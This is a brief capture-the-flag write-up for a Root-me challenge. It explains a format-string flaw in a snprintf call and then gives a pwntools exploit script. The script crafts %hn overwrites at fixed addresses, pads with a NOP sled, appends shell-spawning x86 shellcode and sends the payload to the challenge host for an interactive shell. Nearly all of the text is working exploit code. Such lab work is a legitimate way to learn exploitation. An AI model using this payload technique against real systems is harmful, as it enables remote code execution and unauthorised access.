Root-me
This vulnerability lies in
snprintf(outbuf,size(outbuf),inbuf)
As u can see snprintf 3'rd arguments must be format string which is provided us .
Hence we can exploit it !!!. But the problem i faced was
1) difference in addr of shellcode in bin and gdb so to overcome it we have add Lengthy nopsled
2) the MSB value is < LSB bit so we have to write %6$hn first and the %5$hn
from pwn import *
shellcode="\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
num=0xbfff
num1=0xbfff -8
num2 = 0xf7ac - num
#num = 0xccc4+16
#num1= num - 78
#num2 = 0xffff - num
#r=remote('localhost',56032)
r=remote('challenge02.root-me.org',56032)
fmtstr = pack(0x0804a04c)+pack(0x0804a04e)+"%"+str(num1)+"u"+"%6$hn"+"%"+str(num2)+"u"+"%5$hn"
noplen = (1016-len(fmtstr)-len(shellcode))
nopsled = "\x90"*noplen
payload = fmtstr+nopsled+shellcode
r.sendline(payload)
r.interactive()